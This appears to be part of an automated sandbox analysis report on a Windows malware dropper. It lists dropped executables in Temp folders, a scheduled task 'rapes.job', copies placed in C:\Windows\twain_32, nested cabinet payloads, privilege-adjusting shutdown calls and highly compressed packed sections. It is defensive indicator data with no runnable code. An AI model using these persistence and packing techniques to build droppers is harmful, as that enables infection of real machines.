COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E21F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

1_2_00E21F90

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File created: C:\Windows\Tasks\rapes.job	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Windows\twain_32\1u58lIqYIC.exe
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	File created: C:\Windows\twain_32\0a909eb2a03ef6

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E23BA2	1_2_00E23BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E25C9E	1_2_00E25C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006DA3A	11_2_0006DA3A
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006D780	11_2_0006D780
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00064802	11_2_00064802
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00067000	11_2_00067000
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00071822	11_2_00071822
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00069030	11_2_00069030
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A3C30	11_2_000A3C30
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00061040	11_2_00061040
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00095440	11_2_00095440
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0008D850	11_2_0008D850
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006C470	11_2_0006C470
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006DC9E	11_2_0006DC9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000AC0A0	11_2_000AC0A0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000900B0	11_2_000900B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000AD0C0	11_2_000AD0C0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000AC8C0	11_2_000AC8C0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000ABCE0	11_2_000ABCE0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00088900	11_2_00088900
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00092120	11_2_00092120
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A5160	11_2_000A5160
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006B590	11_2_0006B590
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000739AF	11_2_000739AF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000845B0	11_2_000845B0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000755F0	11_2_000755F0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00063634	11_2_00063634
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000ABA40	11_2_000ABA40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A8240	11_2_000A8240
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00090650	11_2_00090650
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A3250	11_2_000A3250
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006E660	11_2_0006E660
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00090670	11_2_00090670
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A76C0	11_2_000A76C0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006D2F0	11_2_0006D2F0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00076312	11_2_00076312
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00063F20	11_2_00063F20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006FB20	11_2_0006FB20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00068B21	11_2_00068B21
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000AC320	11_2_000AC320
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0008F760	11_2_0008F760
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006A390	11_2_0006A390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_00062790	11_2_00062790
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A5390	11_2_000A5390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0008CBB0	11_2_0008CBB0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_0006CBD0	11_2_0006CBD0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Code function: 11_2_000A2FF0	11_2_000A2FF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D561F0	15_2_00D561F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D5B700	15_2_00D5B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D918D7	15_2_00D918D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D94047	15_2_00D94047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D551A0	15_2_00D551A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D67320	15_2_00D67320
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D95CD4	15_2_00D95CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D7B4C0	15_2_00D7B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D55450	15_2_00D55450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D5CC40	15_2_00D5CC40
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D82C20	15_2_00D82C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D95DF4	15_2_00D95DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D7F6DB	15_2_00D7F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_00D54EF0	15_2_00D54EF0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A43A10	17_2_00A43A10
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6CBB0	17_2_00A6CBB0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6D470	17_2_00A6D470
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4C0A0	17_2_00A4C0A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A478A0	17_2_00A478A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A498A0	17_2_00A498A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5F0A0	17_2_00A5F0A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A470B0	17_2_00A470B0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A700B0	17_2_00A700B0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A810B0	17_2_00A810B0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5A890	17_2_00A5A890
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6F890	17_2_00A6F890
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6A0C0	17_2_00A6A0C0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A850C0	17_2_00A850C0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A558D0	17_2_00A558D0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6C8D0	17_2_00A6C8D0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5F820	17_2_00A5F820
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4A830	17_2_00A4A830
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A41000	17_2_00A41000
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7A000	17_2_00A7A000
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7E860	17_2_00A7E860
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A8D07A	17_2_00A8D07A
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A61070	17_2_00A61070
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A57840	17_2_00A57840
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4B850	17_2_00A4B850
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A561A0	17_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A699A0	17_2_00A699A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4E9B0	17_2_00A4E9B0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A60980	17_2_00A60980
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A66180	17_2_00A66180
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A45990	17_2_00A45990
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A749E0	17_2_00A749E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6D1D0	17_2_00A6D1D0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A77930	17_2_00A77930
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A53100	17_2_00A53100
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4A160	17_2_00A4A160
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A64150	17_2_00A64150
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6C150	17_2_00A6C150
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4D2A0	17_2_00A4D2A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A54AB0	17_2_00A54AB0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A47A80	17_2_00A47A80
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4F280	17_2_00A4F280
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A58A80	17_2_00A58A80
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A55AE0	17_2_00A55AE0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A512E0	17_2_00A512E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6F2E0	17_2_00A6F2E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A85AC0	17_2_00A85AC0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6E220	17_2_00A6E220
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A55210	17_2_00A55210
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A54210	17_2_00A54210
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A63260	17_2_00A63260
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A49270	17_2_00A49270
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4B240	17_2_00A4B240
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A73380	17_2_00A73380
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A613E0	17_2_00A613E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A823E0	17_2_00A823E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5B3F0	17_2_00A5B3F0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5F3C0	17_2_00A5F3C0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A46320	17_2_00A46320
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A46B20	17_2_00A46B20
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A48320	17_2_00A48320
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5E320	17_2_00A5E320
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A76300	17_2_00A76300
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A85310	17_2_00A85310
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A65B60	17_2_00A65B60
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A58340	17_2_00A58340
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A78B40	17_2_00A78B40
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00AA0342	17_2_00AA0342
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A48B50	17_2_00A48B50
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7FB50	17_2_00A7FB50
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A79350	17_2_00A79350
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A53CA0	17_2_00A53CA0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A584A0	17_2_00A584A0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A53490	17_2_00A53490
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7A490	17_2_00A7A490
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A60CE0	17_2_00A60CE0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A61CE0	17_2_00A61CE0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A78CE0	17_2_00A78CE0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7BCF0	17_2_00A7BCF0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A9E4C8	17_2_00A9E4C8
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4FCC0	17_2_00A4FCC0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A64CC0	17_2_00A64CC0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7D4D0	17_2_00A7D4D0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A77C10	17_2_00A77C10
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A62C60	17_2_00A62C60
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A75470	17_2_00A75470
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7EDA0	17_2_00A7EDA0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A495B0	17_2_00A495B0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A43580	17_2_00A43580
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5BD80	17_2_00A5BD80
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A59580	17_2_00A59580
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A84580	17_2_00A84580
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A63DE0	17_2_00A63DE0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A805F0	17_2_00A805F0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6A5C0	17_2_00A6A5C0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A79DC0	17_2_00A79DC0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A795C0	17_2_00A795C0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A555D0	17_2_00A555D0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A73DD0	17_2_00A73DD0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5A520	17_2_00A5A520
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6E510	17_2_00A6E510
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4CD70	17_2_00A4CD70
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4B540	17_2_00A4B540
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7F550	17_2_00A7F550
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A55EA0	17_2_00A55EA0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A886BA	17_2_00A886BA
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A62690	17_2_00A62690
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A6EE90	17_2_00A6EE90
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A85690	17_2_00A85690
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7D6E0	17_2_00A7D6E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A526F0	17_2_00A526F0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A58620	17_2_00A58620
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7FE20	17_2_00A7FE20
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7AE30	17_2_00A7AE30
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A46600	17_2_00A46600
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A85E00	17_2_00A85E00
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A48610	17_2_00A48610
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4DF80	17_2_00A4DF80
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4C780	17_2_00A4C780
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A5CF90	17_2_00A5CF90
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A4F7E0	17_2_00A4F7E0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A92FE0	17_2_00A92FE0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A64FF0	17_2_00A64FF0
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A58F20	17_2_00A58F20
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A47F30	17_2_00A47F30
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A45700	17_2_00A45700
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A71F00	17_2_00A71F00
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A78F10	17_2_00A78F10
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7A760	17_2_00A7A760
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A45F70	17_2_00A45F70
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A7B770	17_2_00A7B770
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A63740	17_2_00A63740

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe

Code function: String function: 00A88BC0 appears 51 times

Source: download.php.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 5492088 bytes, 2 files, at 0x2c +A "G2C28.exe" +A "3B05c.exe", ID 1347, number 1, 170 datablocks, 0x1503 compression
Source: G2C28.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 3611648 bytes, 2 files, at 0x2c +A "1Z46i3.exe" +A "2Q0510.exe", ID 1466, number 1, 156 datablocks, 0x1503 compression

Source: download.php.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[2].exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: d151155bf3.exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 6z1l5Yn[1].exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 6z1l5Yn.exe.15.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3B05c.exe.0.dr	Static PE information: Section: yuojusbw ZLIB complexity 0.9946538894565546
Source: 1Z46i3.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9984504132231405
Source: 1Z46i3.exe.1.dr	Static PE information: Section: zozhizjy ZLIB complexity 0.9944372872541604
Source: rapes.exe.3.dr	Static PE information: Section: ZLIB complexity 0.9984504132231405
Source: rapes.exe.3.dr	Static PE information: Section: zozhizjy ZLIB complexity 0.9944372872541604
Source: EJmAkGq.exe.15.dr	Static PE information: Section: grpnkoxr ZLIB complexity 0.9948958253670848
Source: random[1].exe.15.dr	Static PE information: Section: ZLIB complexity 0.9989287569252078
Source: c353af48cf.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9989287569252078
Source: random[1].exe0.15.dr	Static PE information: Section: azeqhpsz ZLIB complexity 0.9945747154985549
Source: f86c60eea6.exe.15.dr	Static PE information: Section: azeqhpsz ZLIB complexity 0.9945747154985549
Source: random[1].exe1.15.dr	Static PE information: Section: ZLIB complexity 0.9996304898648649
Source: random[1].exe1.15.dr	Static PE information: Section: bwotgmgc ZLIB complexity 0.9943701977136432
Source: f3f3c71039.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9996304898648649
Source: f3f3c71039.exe.15.dr	Static PE information: Section: bwotgmgc ZLIB complexity 0.9943701977136432
Source: random[1].exe2.15.dr	Static PE information: Section: dlsxswkk ZLIB complexity 0.9943084311337467
Source: 477fbd5c21.exe.15.dr	Static PE information: Section: dlsxswkk ZLIB complexity 0.9943084311337467
Source: random[2].exe.15.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003352171985815
Source: 0uzaP1a[1].exe.15.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9960045307845085
Source: d151155bf3.exe.15.dr	Static PE information: Section: .CSS ZLIB complexity 1.0003352171985815
Source: 0uzaP1a.exe.15.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9960045307845085
Source: ClhN6R8.exe.15.dr	Static PE information: Section: .bss ZLIB complexity 1.0003352171985815
Source: 8p5Lrev[1].exe.15.dr	Static PE information: Section: .bss ZLIB complexity 1.0003184730209742
Source: cuFIzyH[1].exe.15.dr	Static PE information: Section: ZLIB complexity 0.9989179362880887
Source: cuFIzyH[1].exe.15.dr	Static PE information: Section: cwyzemoa ZLIB complexity 0.9945611227349509
Source: cuFIzyH.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9989179362880887
Source: cuFIzyH.exe.15.dr	Static PE information: Section: cwyzemoa ZLIB complexity 0.9945611227349509
Source: P2SXMuh[1].exe.15.dr	Static PE information: Section: .bss ZLIB complexity 1.0003222795163584
Source: P2SXMuh[1].exe.15.dr	Static PE information: Section: .bss ZLIB complexity 1.0003222795163584
Source: P2SXMuh.exe.15.dr	Static PE information: Section: .bss ZLIB complexity 1.0003222795163584
Source: P2SXMuh.exe.15.dr	Static PE information: Section: .bss ZLIB complexity 1.0003222795163584
Source: cuFIzyH.exe0.15.dr	Static PE information: Section: ZLIB complexity 0.9989179362880887
Source: cuFIzyH.exe0.15.dr	Static PE information: Section: cwyzemoa ZLIB complexity 0.9945611227349509
